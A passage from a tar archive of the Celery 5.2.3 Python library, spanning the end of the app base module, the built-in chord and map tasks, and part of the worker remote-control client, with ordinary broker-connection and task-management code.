unless they can be delivered to a " "consumer immediately.\"\n" "If this was unintended, please check the code which " "published this task." ) expires_s = 0 options["expiration"] = expires_s if not root_id or not parent_id: parent = self.current_worker_task if parent: if not root_id: root_id = parent.request.root_id or parent.request.id if not parent_id: parent_id = parent.request.id if conf.task_inherit_parent_priority: options.setdefault('priority', parent.request.delivery_info.get('priority')) message = amqp.create_task_message( task_id, name, args, kwargs, countdown, eta, group_id, group_index, expires, retries, chord, maybe_list(link), maybe_list(link_error), reply_to or self.thread_oid, time_limit, soft_time_limit, self.conf.task_send_sent_event, root_id, parent_id, shadow, chain, ignore_result=ignore_result, argsrepr=options.get('argsrepr'), kwargsrepr=options.get('kwargsrepr'), ) if connection: producer = amqp.Producer(connection, auto_declare=False) with self.producer_or_acquire(producer) as P: with P.connection._reraise_as_library_errors(): if not ignore_result: self.backend.on_task_call(P, task_id) amqp.send_task_message(P, name, message, **options) result = (result_cls or self.AsyncResult)(task_id) # We avoid using the constructor since a custom result class # can be used, in which case the constructor may still use # the old signature. result.ignored = ignore_result if add_to_parent: if not have_parent: parent, have_parent = self.current_worker_task, True if parent: parent.add_trail(result) return result def connection_for_read(self, url=None, **kwargs): """Establish connection used for consuming. See Also: :meth:`connection` for supported arguments. """ return self._connection(url or self.conf.broker_read_url, **kwargs) def connection_for_write(self, url=None, **kwargs): """Establish connection used for producing. See Also: :meth:`connection` for supported arguments. """ return self._connection(url or self.conf.broker_write_url, **kwargs) def connection(self, hostname=None, userid=None, password=None, virtual_host=None, port=None, ssl=None, connect_timeout=None, transport=None, transport_options=None, heartbeat=None, login_method=None, failover_strategy=None, **kwargs): """Establish a connection to the message broker. Please use :meth:`connection_for_read` and :meth:`connection_for_write` instead, to convey the intent of use for this connection. Arguments: url: Either the URL or the hostname of the broker to use. hostname (str): URL, Hostname/IP-address of the broker. If a URL is used, then the other argument below will be taken from the URL instead. userid (str): Username to authenticate as. password (str): Password to authenticate with virtual_host (str): Virtual host to use (domain). port (int): Port to connect to. ssl (bool, Dict): Defaults to the :setting:`broker_use_ssl` setting. transport (str): defaults to the :setting:`broker_transport` setting. transport_options (Dict): Dictionary of transport specific options. heartbeat (int): AMQP Heartbeat in seconds (``pyamqp`` only). login_method (str): Custom login method to use (AMQP only). failover_strategy (str, Callable): Custom failover strategy. **kwargs: Additional arguments to :class:`kombu.Connection`. Returns: kombu.Connection: the lazy connection instance. """ return self.connection_for_write( hostname or self.conf.broker_write_url, userid=userid, password=password, virtual_host=virtual_host, port=port, ssl=ssl, connect_timeout=connect_timeout, transport=transport, transport_options=transport_options, heartbeat=heartbeat, login_method=login_method, failover_strategy=failover_strategy, **kwargs ) def _connection(self, url, userid=None, password=None, virtual_host=None, port=None, ssl=None, connect_timeout=None, transport=None, transport_options=None, heartbeat=None, login_method=None, failover_strategy=None, **kwargs): conf = self.conf return self.amqp.Connection( url, userid or conf.broker_user, password or conf.broker_password, virtual_host or conf.broker_vhost, port or conf.broker_port, transport=transport or conf.broker_transport, ssl=self.either('broker_use_ssl', ssl), heartbeat=heartbeat, login_method=login_method or conf.broker_login_method, failover_strategy=( failover_strategy or conf.broker_failover_strategy ), transport_options=dict( conf.broker_transport_options, **transport_options or {} ), connect_timeout=self.either( 'broker_connection_timeout', connect_timeout ), ) broker_connection = connection def _acquire_connection(self, pool=True): """Helper for :meth:`connection_or_acquire`.""" if pool: return self.pool.acquire(block=True) return self.connection_for_write() def connection_or_acquire(self, connection=None, pool=True, *_, **__): """Context used to acquire a connection from the pool. For use within a :keyword:`with` statement to get a connection from the pool if one is not already provided. Arguments: connection (kombu.Connection): If not provided, a connection will be acquired from the connection pool. """ return FallbackContext(connection, self._acquire_connection, pool=pool) default_connection = connection_or_acquire # XXX compat def producer_or_acquire(self, producer=None): """Context used to acquire a producer from the pool. For use within a :keyword:`with` statement to get a producer from the pool if one is not already provided Arguments: producer (kombu.Producer): If not provided, a producer will be acquired from the producer pool. """ return FallbackContext( producer, self.producer_pool.acquire, block=True, ) default_producer = producer_or_acquire # XXX compat def prepare_config(self, c): """Prepare configuration before it is merged with the defaults.""" return find_deprecated_settings(c) def now(self): """Return the current time and date as a datetime.""" now_in_utc = to_utc(datetime.utcnow()) return now_in_utc.astimezone(self.timezone) def select_queues(self, queues=None): """Select subset of queues. Arguments: queues (Sequence[str]): a list of queue names to keep. """ return self.amqp.queues.select(queues) def either(self, default_key, *defaults): """Get key from configuration or use default values. Fallback to the value of a configuration key if none of the `*values` are true. """ return first(None, [ first(None, defaults), starpromise(self.conf.get, default_key), ]) def bugreport(self): """Return information useful in bug reports.""" return bugreport(self) def _get_backend(self): backend, url = backends.by_url( self.backend_cls or self.conf.result_backend, self.loader) return backend(app=self, url=url) def _finalize_pending_conf(self): """Get config value by key and finalize loading the configuration. Note: This is used by PendingConfiguration: as soon as you access a key the configuration is read. """ conf = self._conf = self._load_config() return conf def _load_config(self): if isinstance(self.on_configure, Signal): self.on_configure.send(sender=self) else: # used to be a method pre 4.0 self.on_configure() if self._config_source: self.loader.config_from_object(self._config_source) self.configured = True settings = detect_settings( self.prepare_config(self.loader.conf), self._preconf, ignore_keys=self._preconf_set_by_auto, prefix=self.namespace, ) if self._conf is not None: # replace in place, as someone may have referenced app.conf, # done some changes, accessed a key, and then try to make more # changes to the reference and not the finalized value. self._conf.swap_with(settings) else: self._conf = settings # load lazy config dict initializers. pending_def = self._pending_defaults while pending_def: self._conf.add_defaults(maybe_evaluate(pending_def.popleft()())) # load lazy periodic tasks pending_beat = self._pending_periodic_tasks while pending_beat: self._add_periodic_task(*pending_beat.popleft()) self.on_after_configure.send(sender=self, source=self._conf) return self._conf def _after_fork(self): self._pool = None try: self.__dict__['amqp']._producer_pool = None except (AttributeError, KeyError): pass self.on_after_fork.send(sender=self) def signature(self, *args, **kwargs): """Return a new :class:`~celery.Signature` bound to this app.""" kwargs['app'] = self return self._canvas.signature(*args, **kwargs) def add_periodic_task(self, schedule, sig, args=(), kwargs=(), name=None, **opts): key, entry = self._sig_to_periodic_task_entry( schedule, sig, args, kwargs, name, **opts) if self.configured: self._add_periodic_task(key, entry) else: self._pending_periodic_tasks.append((key, entry)) return key def _sig_to_periodic_task_entry(self, schedule, sig, args=(), kwargs=None, name=None, **opts): kwargs = {} if not kwargs else kwargs sig = (sig.clone(args, kwargs) if isinstance(sig, abstract.CallableSignature) else self.signature(sig.name, args, kwargs)) return name or repr(sig), { 'schedule': schedule, 'task': sig.name, 'args': sig.args, 'kwargs': sig.kwargs, 'options': dict(sig.options, **opts), } def _add_periodic_task(self, key, entry): self._conf.beat_schedule[key] = entry def create_task_cls(self): """Create a base task class bound to this app.""" return self.subclass_with_self( self.task_cls, name='Task', attribute='_app', keep_reduce=True, abstract=True, ) def subclass_with_self(self, Class, name=None, attribute='app', reverse=None, keep_reduce=False, **kw): """Subclass an app-compatible class. App-compatible means that the class has a class attribute that provides the default app it should use, for example: ``class Foo: app = None``. Arguments: Class (type): The app-compatible class to subclass. name (str): Custom name for the target class. attribute (str): Name of the attribute holding the app, Default is 'app'. reverse (str): Reverse path to this object used for pickling purposes. For example, to get ``app.AsyncResult``, use ``"AsyncResult"``. keep_reduce (bool): If enabled a custom ``__reduce__`` implementation won't be provided. """ Class = symbol_by_name(Class) reverse = reverse if reverse else Class.__name__ def __reduce__(self): return _unpickle_appattr, (reverse, self.__reduce_args__()) attrs = dict( {attribute: self}, __module__=Class.__module__, __doc__=Class.__doc__, **kw) if not keep_reduce: attrs['__reduce__'] = __reduce__ return type(name or Class.__name__, (Class,), attrs) def _rgetattr(self, path): return attrgetter(path)(self) def __enter__(self): return self def __exit__(self, *exc_info): self.close() def __repr__(self): return f'<{type(self).__name__} {appstr(self)}>' def __reduce__(self): if self._using_v1_reduce: return self.__reduce_v1__() return (_unpickle_app_v2, (self.__class__, self.__reduce_keys__())) def __reduce_v1__(self): # Reduce only pickles the configuration changes, # so the default configuration doesn't have to be passed # between processes. return ( _unpickle_app, (self.__class__, self.Pickler) + self.__reduce_args__(), ) def __reduce_keys__(self): """Keyword arguments used to reconstruct the object when unpickling.""" return { 'main': self.main, 'changes': self._conf.changes if self.configured else self._preconf, 'loader': self.loader_cls, 'backend': self.backend_cls, 'amqp': self.amqp_cls, 'events': self.events_cls, 'log': self.log_cls, 'control': self.control_cls, 'fixups': self.fixups, 'config_source': self._config_source, 'task_cls': self.task_cls, 'namespace': self.namespace, } def __reduce_args__(self): """Deprecated method, please use :meth:`__reduce_keys__` instead.""" return (self.main, self._conf.changes if self.configured else {}, self.loader_cls, self.backend_cls, self.amqp_cls, self.events_cls, self.log_cls, self.control_cls, False, self._config_source) @cached_property def Worker(self): """Worker application. See Also: :class:`~@Worker`. """ return self.subclass_with_self('celery.apps.worker:Worker') @cached_property def WorkController(self, **kwargs): """Embeddable worker. See Also: :class:`~@WorkController`. """ return self.subclass_with_self('celery.worker:WorkController') @cached_property def Beat(self, **kwargs): """:program:`celery beat` scheduler application. See Also: :class:`~@Beat`. """ return self.subclass_with_self('celery.apps.beat:Beat') @cached_property def Task(self): """Base task class for this app.""" return self.create_task_cls() @cached_property def annotations(self): return prepare_annotations(self.conf.task_annotations) @cached_property def AsyncResult(self): """Create new result instance. See Also: :class:`celery.result.AsyncResult`. """ return self.subclass_with_self('celery.result:AsyncResult') @cached_property def ResultSet(self): return self.subclass_with_self('celery.result:ResultSet') @cached_property def GroupResult(self): """Create new group result instance. See Also: :class:`celery.result.GroupResult`. """ return self.subclass_with_self('celery.result:GroupResult') @property def pool(self): """Broker connection pool: :class:`~@pool`. Note: This attribute is not related to the workers concurrency pool. """ if self._pool is None: self._ensure_after_fork() limit = self.conf.broker_pool_limit pools.set_limit(limit) self._pool = pools.connections[self.connection_for_write()] return self._pool @property def current_task(self): """Instance of task being executed, or :const:`None`.""" return _task_stack.top @property def current_worker_task(self): """The task currently being executed by a worker or :const:`None`. Differs from :data:`current_task` in that it's not affected by tasks calling other tasks directly, or eagerly. """ return get_current_worker_task() @cached_property def oid(self): """Universally unique identifier for this app.""" # since 4.0: thread.get_ident() is not included when # generating the process id. This is due to how the RPC # backend now dedicates a single thread to receive results, # which would not work if each thread has a separate id. return oid_from(self, threads=False) @property def thread_oid(self): """Per-thread unique identifier for this app.""" try: return self._local.oid except AttributeError: self._local.oid = new_oid = oid_from(self, threads=True) return new_oid @cached_property def amqp(self): """AMQP related functionality: :class:`~@amqp`.""" return instantiate(self.amqp_cls, app=self) @property def backend(self): """Current backend instance.""" try: return self._local.backend except AttributeError: self._local.backend = new_backend = self._get_backend() return new_backend @property def conf(self): """Current configuration.""" if self._conf is None: self._conf = self._load_config() return self._conf @conf.setter def conf(self, d): self._conf = d @cached_property def control(self): """Remote control: :class:`~@control`.""" return instantiate(self.control_cls, app=self) @cached_property def events(self): """Consuming and sending events: :class:`~@events`.""" return instantiate(self.events_cls, app=self) @cached_property def loader(self): """Current loader instance.""" return get_loader_cls(self.loader_cls)(app=self) @cached_property def log(self): """Logging: :class:`~@log`.""" return instantiate(self.log_cls, app=self) @cached_property def _canvas(self): from celery import canvas return canvas @cached_property def tasks(self): """Task registry. Warning: Accessing this attribute will also auto-finalize the app. """ self.finalize(auto=True) return self._tasks @property def producer_pool(self): return self.amqp.producer_pool def uses_utc_timezone(self): """Check if the application uses the UTC timezone.""" return self.timezone == timezone.utc @cached_property def timezone(self): """Current timezone for this app. This is a cached property taking the time zone from the :setting:`timezone` setting. """ conf = self.conf if not conf.timezone: if conf.enable_utc: return timezone.utc else: return timezone.local return timezone.get_timezone(conf.timezone) App = Celery # XXX compat ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/builtins.py0000664000175000017500000001502100000000000017142 0ustar00asifasif00000000000000"""Built-in Tasks. The built-in tasks are always available in all app instances. """ from celery._state import connect_on_app_finalize from celery.utils.log import get_logger __all__ = () logger = get_logger(__name__) @connect_on_app_finalize def add_backend_cleanup_task(app): """Task used to clean up expired results. If the configured backend requires periodic cleanup this task is also automatically configured to run every day at 4am (requires :program:`celery beat` to be running). """ @app.task(name='celery.backend_cleanup', shared=False, lazy=False) def backend_cleanup(): app.backend.cleanup() return backend_cleanup @connect_on_app_finalize def add_accumulate_task(app): """Task used by Task.replace when replacing task with group.""" @app.task(bind=True, name='celery.accumulate', shared=False, lazy=False) def accumulate(self, *args, **kwargs): index = kwargs.get('index') return args[index] if index is not None else args return accumulate @connect_on_app_finalize def add_unlock_chord_task(app): """Task used by result backends without native chord support. Will joins chord by creating a task chain polling the header for completion. """ from celery.canvas import maybe_signature from celery.exceptions import ChordError from celery.result import allow_join_result, result_from_tuple @app.task(name='celery.chord_unlock', max_retries=None, shared=False, default_retry_delay=app.conf.result_chord_retry_interval, ignore_result=True, lazy=False, bind=True) def unlock_chord(self, group_id, callback, interval=None, max_retries=None, result=None, Result=app.AsyncResult, GroupResult=app.GroupResult, result_from_tuple=result_from_tuple, **kwargs): if interval is None: interval = self.default_retry_delay # check if the task group is ready, and if so apply the callback. callback = maybe_signature(callback, app) deps = GroupResult( group_id, [result_from_tuple(r, app=app) for r in result], app=app, ) j = deps.join_native if deps.supports_native_join else deps.join try: ready = deps.ready() except Exception as exc: raise self.retry( exc=exc, countdown=interval, max_retries=max_retries, ) else: if not ready: raise self.retry(countdown=interval, max_retries=max_retries) callback = maybe_signature(callback, app=app) try: with allow_join_result(): ret = j( timeout=app.conf.result_chord_join_timeout, propagate=True, ) except Exception as exc: # pylint: disable=broad-except try: culprit = next(deps._failed_join_report()) reason = f'Dependency {culprit.id} raised {exc!r}' except StopIteration: reason = repr(exc) logger.exception('Chord %r raised: %r', group_id, exc) app.backend.chord_error_from_stack(callback, ChordError(reason)) else: try: callback.delay(ret) except Exception as exc: # pylint: disable=broad-except logger.exception('Chord %r raised: %r', group_id, exc) app.backend.chord_error_from_stack( callback, exc=ChordError(f'Callback error: {exc!r}'), ) return unlock_chord @connect_on_app_finalize def add_map_task(app): from celery.canvas import signature @app.task(name='celery.map', shared=False, lazy=False) def xmap(task, it): task = signature(task, app=app).type return [task(item) for item in it] return xmap @connect_on_app_finalize def add_starmap_task(app): from celery.canvas import signature @app.task(name='celery.starmap', shared=False, lazy=False) def xstarmap(task, it): task = signature(task, app=app).type return [task(*item) for item in it] return xstarmap @connect_on_app_finalize def add_chunk_task(app): from celery.canvas import chunks as _chunks @app.task(name='celery.chunks', shared=False, lazy=False) def chunks(task, it, n): return _chunks.apply_chunks(task, it, n) return chunks @connect_on_app_finalize def add_group_task(app): """No longer used, but here for backwards compatibility.""" from celery.canvas import maybe_signature from celery.result import result_from_tuple @app.task(name='celery.group', bind=True, shared=False, lazy=False) def group(self, tasks, result, group_id, partial_args, add_to_parent=True): app = self.app result = result_from_tuple(result, app) # any partial args are added to all tasks in the group taskit = (maybe_signature(task, app=app).clone(partial_args) for i, task in enumerate(tasks)) with app.producer_or_acquire() as producer: [stask.apply_async(group_id=group_id, producer=producer, add_to_parent=False) for stask in taskit] parent = app.current_worker_task if add_to_parent and parent: parent.add_trail(result) return result return group @connect_on_app_finalize def add_chain_task(app): """No longer used, but here for backwards compatibility.""" @app.task(name='celery.chain', shared=False, lazy=False) def chain(*args, **kwargs): raise NotImplementedError('chain is not a real task') return chain @connect_on_app_finalize def add_chord_task(app): """No longer used, but here for backwards compatibility.""" from celery import chord as _chord from celery import group from celery.canvas import maybe_signature @app.task(name='celery.chord', bind=True, ignore_result=False, shared=False, lazy=False) def chord(self, header, body, partial_args=(), interval=None, countdown=1, max_retries=None, eager=False, **kwargs): app = self.app # - convert back to group if serialized tasks = header.tasks if isinstance(header, group) else header header = group([ maybe_signature(s, app=app) for s in tasks ], app=self.app) body = maybe_signature(body, app=app) ch = _chord(header, body) return ch.run(header, body, partial_args, app, interval, countdown, max_retries, **kwargs) return chord ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/control.py0000664000175000017500000006630100000000000017000 0ustar00asifasif00000000000000"""Worker Remote Control Client. Client for worker remote control commands. Server implementation is in :mod:`celery.worker.control`. There are two types of remote control commands: * Inspect commands: Does not have side effects, will usually just return some value found in the worker, like the list of currently registered tasks, the list of active tasks, etc. Commands are accessible via :class:`Inspect` class. * Control commands: Performs side effects, like adding a new queue to consume from. Commands are accessible via :class:`Control` class. """ import warnings from billiard.common import TERM_SIGNAME from kombu.matcher import match from kombu.pidbox import Mailbox from kombu.utils.compat import register_after_fork from kombu.utils.functional import lazy from kombu.utils.objects import cached_property from celery.exceptions import DuplicateNodenameWarning from celery.utils.log import get_logger from celery.utils.text import pluralize __all__ = ('Inspect', 'Control', 'flatten_reply') logger = get_logger(__name__) W_DUPNODE = """\ Received multiple replies from node {0}: {1}. Please make sure you give each node a unique nodename using the celery worker `-n` option.\ """ def flatten_reply(reply): """Flatten node replies. Convert from a list of replies in this format:: [{'a@example.com': reply}, {'b@example.com': reply}] into this format:: {'a@example.com': reply, 'b@example.com': reply} """ nodes, dupes = {}, set() for item in reply: [dupes.add(name) for name in item if name in nodes] nodes.update(item) if dupes: warnings.warn(DuplicateNodenameWarning( W_DUPNODE.format( pluralize(len(dupes), 'name'), ', '.join(sorted(dupes)), ), )) return nodes def _after_fork_cleanup_control(control): try: control._after_fork() except Exception as exc: # pylint: disable=broad-except logger.info('after fork raised exception: %r', exc, exc_info=1) class Inspect: """API for inspecting workers. This class provides proxy for accessing Inspect API of workers. The API is defined in :py:mod:`celery.worker.control` """ app = None def __init__(self, destination=None, timeout=1.0, callback=None, connection=None, app=None, limit=None, pattern=None, matcher=None): self.app = app or self.app self.destination = destination self.timeout = timeout self.callback = callback self.connection = connection self.limit = limit self.pattern = pattern self.matcher = matcher def _prepare(self, reply): if reply: by_node = flatten_reply(reply) if (self.destination and not isinstance(self.destination, (list, tuple))): return by_node.get(self.destination) if self.pattern: pattern = self.pattern matcher = self.matcher return {node: reply for node, reply in by_node.items() if match(node, pattern, matcher)} return by_node def _request(self, command, **kwargs): return self._prepare(self.app.control.broadcast( command, arguments=kwargs, destination=self.destination, callback=self.callback, connection=self.connection, limit=self.limit, timeout=self.timeout, reply=True, pattern=self.pattern, matcher=self.matcher, )) def report(self): """Return human readable report for each worker. Returns: Dict: Dictionary ``{HOSTNAME: {'ok': REPORT_STRING}}``. """ return self._request('report') def clock(self): """Get the Clock value on workers. >>> app.control.inspect().clock() {'celery@node1': {'clock': 12}} Returns: Dict: Dictionary ``{HOSTNAME: CLOCK_VALUE}``. """ return self._request('clock') def active(self, safe=None): """Return list of tasks currently executed by workers. Arguments: safe (Boolean): Set to True to disable deserialization. Returns: Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. See Also: For ``TASK_INFO`` details see :func:`query_task` return value. """ return self._request('active', safe=safe) def scheduled(self, safe=None): """Return list of scheduled tasks with details. Returns: Dict: Dictionary ``{HOSTNAME: [TASK_SCHEDULED_INFO,...]}``. Here is the list of ``TASK_SCHEDULED_INFO`` fields: * ``eta`` - scheduled time for task execution as string in ISO 8601 format * ``priority`` - priority of the task * ``request`` - field containing ``TASK_INFO`` value. See Also: For more details about ``TASK_INFO`` see :func:`query_task` return value. """ return self._request('scheduled') def reserved(self, safe=None): """Return list of currently reserved tasks, not including scheduled/active. Returns: Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. See Also: For ``TASK_INFO`` details see :func:`query_task` return value. """ return self._request('reserved') def stats(self): """Return statistics of worker. Returns: Dict: Dictionary ``{HOSTNAME: STAT_INFO}``. Here is the list of ``STAT_INFO`` fields: * ``broker`` - Section for broker information. * ``connect_timeout`` - Timeout in seconds (int/float) for establishing a new connection. * ``heartbeat`` - Current heartbeat value (set by client). * ``hostname`` - Node name of the remote broker. * ``insist`` - No longer used. * ``login_method`` - Login method used to connect to the broker. * ``port`` - Port of the remote broker. * ``ssl`` - SSL enabled/disabled. * ``transport`` - Name of transport used (e.g., amqp or redis) * ``transport_options`` - Options passed to transport. * ``uri_prefix`` - Some transports expects the host name to be a URL. E.g. ``redis+socket:///tmp/redis.sock``. In this example the URI-prefix will be redis. * ``userid`` - User id used to connect to the broker with. * ``virtual_host`` - Virtual host used. * ``clock`` - Value of the workers logical clock. This is a positive integer and should be increasing every time you receive statistics. * ``uptime`` - Numbers of seconds since the worker controller was started * ``pid`` - Process id of the worker instance (Main process). * ``pool`` - Pool-specific section. * ``max-concurrency`` - Max number of processes/threads/green threads. * ``max-tasks-per-child`` - Max number of tasks a thread may execute before being recycled. * ``processes`` - List of PIDs (or thread-id’s). * ``put-guarded-by-semaphore`` - Internal * ``timeouts`` - Default values for time limits. * ``writes`` - Specific to the prefork pool, this shows the distribution of writes to each process in the pool when using async I/O. * ``prefetch_count`` - Current prefetch count value for the task consumer. * ``rusage`` - System usage statistics. The fields available may be different on your platform. From :manpage:`getrusage(2)`: * ``stime`` - Time spent in operating system code on behalf of this process. * ``utime`` - Time spent executing user instructions. * ``maxrss`` - The maximum resident size used by this process (in kilobytes). * ``idrss`` - Amount of non-shared memory used for data (in kilobytes times ticks of execution) * ``isrss`` - Amount of non-shared memory used for stack space (in kilobytes times ticks of execution) * ``ixrss`` - Amount of memory shared with other processes (in kilobytes times ticks of execution). * ``inblock`` - Number of times the file system had to read from the disk on behalf of this process. * ``oublock`` - Number of times the file system has to write to disk on behalf of this process. * ``majflt`` - Number of page faults that were serviced by doing I/O. * ``minflt`` - Number of page faults that were serviced without doing I/O. * ``msgrcv`` - Number of IPC messages received. * ``msgsnd`` - Number of IPC messages sent. * ``nvcsw`` - Number of times this process voluntarily invoked a context switch. * ``nivcsw`` - Number of times an involuntary context switch took place. * ``nsignals`` - Number of signals received. * ``nswap`` - The number of times this process was swapped entirely out of memory. * ``total`` - Map of task names and the total number of tasks with that type the worker has accepted since start-up. """ return self._request('stats') def revoked(self): """Return list of revoked tasks. >>> app.control.inspect().revoked() {'celery@node1': ['16f527de-1c72-47a6-b477-c472b92fef7a']} Returns: Dict: Dictionary ``{HOSTNAME: [TASK_ID, ...]}``. """ return self._request('revoked') def registered(self, *taskinfoitems): """Return all registered tasks per worker. >>> app.control.inspect().registered() {'celery@node1': ['task1', 'task1']} >>> app.control.inspect().registered('serializer', 'max_retries') {'celery@node1': ['task_foo [serializer=json max_retries=3]', 'tasb_bar [serializer=json max_retries=3]']} Arguments: taskinfoitems (Sequence[str]): List of :class:`~celery.app.task.Task` attributes to include. Returns: Dict: Dictionary ``{HOSTNAME: [TASK1_INFO, ...]}``. """ return self._request('registered', taskinfoitems=taskinfoitems) registered_tasks = registered def ping(self, destination=None): """Ping all (or specific) workers. >>> app.control.inspect().ping() {'celery@node1': {'ok': 'pong'}, 'celery@node2': {'ok': 'pong'}} >>> app.control.inspect().ping(destination=['celery@node1']) {'celery@node1': {'ok': 'pong'}} Arguments: destination (List): If set, a list of the hosts to send the command to, when empty broadcast to all workers. Returns: Dict: Dictionary ``{HOSTNAME: {'ok': 'pong'}}``. See Also: :meth:`broadcast` for supported keyword arguments. """ if destination: self.destination = destination return self._request('ping') def active_queues(self): """Return information about queues from which worker consumes tasks. Returns: Dict: Dictionary ``{HOSTNAME: [QUEUE_INFO, QUEUE_INFO,...]}``. Here is the list of ``QUEUE_INFO`` fields: * ``name`` * ``exchange`` * ``name`` * ``type`` * ``arguments`` * ``durable`` * ``passive`` * ``auto_delete`` * ``delivery_mode`` * ``no_declare`` * ``routing_key`` * ``queue_arguments`` * ``binding_arguments`` * ``consumer_arguments`` * ``durable`` * ``exclusive`` * ``auto_delete`` * ``no_ack`` * ``alias`` * ``bindings`` * ``no_declare`` * ``expires`` * ``message_ttl`` * ``max_length`` * ``max_length_bytes`` * ``max_priority`` See Also: See the RabbitMQ/AMQP documentation for more details about ``queue_info`` fields. Note: The ``queue_info`` fields are RabbitMQ/AMQP oriented. Not all fields applies for other transports. """ return self._request('active_queues') def query_task(self, *ids): """Return detail of tasks currently executed by workers. Arguments: *ids (str): IDs of tasks to be queried. Returns: Dict: Dictionary ``{HOSTNAME: {TASK_ID: [STATE, TASK_INFO]}}``. Here is the list of ``TASK_INFO`` fields: * ``id`` - ID of the task * ``name`` - Name of the task * ``args`` - Positinal arguments passed to the task * ``kwargs`` - Keyword arguments passed to the task * ``type`` - Type of the task * ``hostname`` - Hostname of the worker processing the task * ``time_start`` - Time of processing start * ``acknowledged`` - True when task was acknowledged to broker * ``delivery_info`` - Dictionary containing delivery information * ``exchange`` - Name of exchange where task was published * ``routing_key`` - Routing key used when task was published * ``priority`` - Priority used when task was published * ``redelivered`` - True if the task was redelivered * ``worker_pid`` - PID of worker processin the task """ # signature used be unary: query_task(ids=[id1, id2]) # we need this to preserve backward compatibility. if len(ids) == 1 and isinstance(ids[0], (list, tuple)): ids = ids[0] return self._request('query_task', ids=ids) def conf(self, with_defaults=False): """Return configuration of each worker. Arguments: with_defaults (bool): if set to True, method returns also configuration options with default values. Returns: Dict: Dictionary ``{HOSTNAME: WORKER_CONFIGURATION}``. See Also: ``WORKER_CONFIGURATION`` is a dictionary containing current configuration options. See :ref:`configuration` for possible values. """ return self._request('conf', with_defaults=with_defaults) def hello(self, from_node, revoked=None): return self._request('hello', from_node=from_node, revoked=revoked) def memsample(self): """Return sample current RSS memory usage. Note: Requires the psutils library. """ return self._request('memsample') def memdump(self, samples=10): """Dump statistics of previous memsample requests. Note: Requires the psutils library. """ return self._request('memdump', samples=samples) def objgraph(self, type='Request', n=200, max_depth=10): """Create graph of uncollected objects (memory-leak debugging). Arguments: n (int): Max number of objects to graph. max_depth (int): Traverse at most n levels deep. type (str): Name of object to graph. Default is ``"Request"``. Returns: Dict: Dictionary ``{'filename': FILENAME}`` Note: Requires the objgraph library. """ return self._request('objgraph', num=n, max_depth=max_depth, type=type) class Control: """Worker remote control client.""" Mailbox = Mailbox def __init__(self, app=None): self.app = app self.mailbox = self.Mailbox( app.conf.control_exchange, type='fanout', accept=app.conf.accept_content, serializer=app.conf.task_serializer, producer_pool=lazy(lambda: self.app.amqp.producer_pool), queue_ttl=app.conf.control_queue_ttl, reply_queue_ttl=app.conf.control_queue_ttl, queue_expires=app.conf.control_queue_expires, reply_queue_expires=app.conf.control_queue_expires, ) register_after_fork(self, _after_fork_cleanup_control) def _after_fork(self): del self.mailbox.producer_pool @cached_property def inspect(self): """Create new :class:`Inspect` instance.""" return self.app.subclass_with_self(Inspect, reverse='control.inspect') def purge(self, connection=None): """Discard all waiting tasks. This will ignore all tasks waiting for execution, and they will be deleted from the messaging server. Arguments: connection (kombu.Connection): Optional specific connection instance to use. If not provided a connection will be acquired from the connection pool. Returns: int: the number of tasks discarded. """ with self.app.connection_or_acquire(connection) as conn: return self.app.amqp.TaskConsumer(conn).purge() discard_all = purge def election(self, id, topic, action=None, connection=None): self.broadcast( 'election', connection=connection, destination=None, arguments={ 'id': id, 'topic': topic, 'action': action, }, ) def revoke(self, task_id, destination=None, terminate=False, signal=TERM_SIGNAME, **kwargs): """Tell all (or specific) workers to revoke a task by id (or list of ids). If a task is revoked, the workers will ignore the task and not execute it after all. Arguments: task_id (Union(str, list)): Id of the task to revoke (or list of ids). terminate (bool): Also terminate the process currently working on the task (if any). signal (str): Name of signal to send to process if terminate. Default is TERM. See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast('revoke', destination=destination, arguments={ 'task_id': task_id, 'terminate': terminate, 'signal': signal, }, **kwargs) def terminate(self, task_id, destination=None, signal=TERM_SIGNAME, **kwargs): """Tell all (or specific) workers to terminate a task by id (or list of ids). See Also: This is just a shortcut to :meth:`revoke` with the terminate argument enabled. """ return self.revoke( task_id, destination=destination, terminate=True, signal=signal, **kwargs) def ping(self, destination=None, timeout=1.0, **kwargs): """Ping all (or specific) workers. >>> app.control.ping() [{'celery@node1': {'ok': 'pong'}}, {'celery@node2': {'ok': 'pong'}}] >>> app.control.ping(destination=['celery@node2']) [{'celery@node2': {'ok': 'pong'}}] Returns: List[Dict]: List of ``{HOSTNAME: {'ok': 'pong'}}`` dictionaries. See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast( 'ping', reply=True, arguments={}, destination=destination, timeout=timeout, **kwargs) def rate_limit(self, task_name, rate_limit, destination=None, **kwargs): """Tell workers to set a new rate limit for task by type. Arguments: task_name (str): Name of task to change rate limit for. rate_limit (int, str): The rate limit as tasks per second, or a rate limit string (`'100/m'`, etc. see :attr:`celery.app.task.Task.rate_limit` for more information). See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast( 'rate_limit', destination=destination, arguments={ 'task_name': task_name, 'rate_limit': rate_limit, }, **kwargs) def add_consumer(self, queue, exchange=None, exchange_type='direct', routing_key=None, options=None, destination=None, **kwargs): """Tell all (or specific) workers to start consuming from a new queue. Only the queue name is required as if only the queue is specified then the exchange/routing key will be set to the same name ( like automatic queues do). Note: This command does not respect the default queue/exchange options in the configuration. Arguments: queue (str): Name of queue to start consuming from. exchange (str): Optional name of exchange. exchange_type (str): Type of exchange (defaults to 'direct') command to, when empty broadcast to all workers. routing_key (str): Optional routing key. options (Dict): Additional options as supported by :meth:`kombu.entity.Queue.from_dict`. See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast( 'add_consumer', destination=destination, arguments=dict({ 'queue': queue, 'exchange': exchange, 'exchange_type': exchange_type, 'routing_key': routing_key, }, **options or {}), **kwargs ) def cancel_consumer(self, queue, destination=None, **kwargs): """Tell all (or specific) workers to stop consuming from ``queue``. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'cancel_consumer', destination=destination, arguments={'queue': queue}, **kwargs) def time_limit(self, task_name, soft=None, hard=None, destination=None, **kwargs): """Tell workers to set time limits for a task by type. Arguments: task_name (str): Name of task to change time limits for. soft 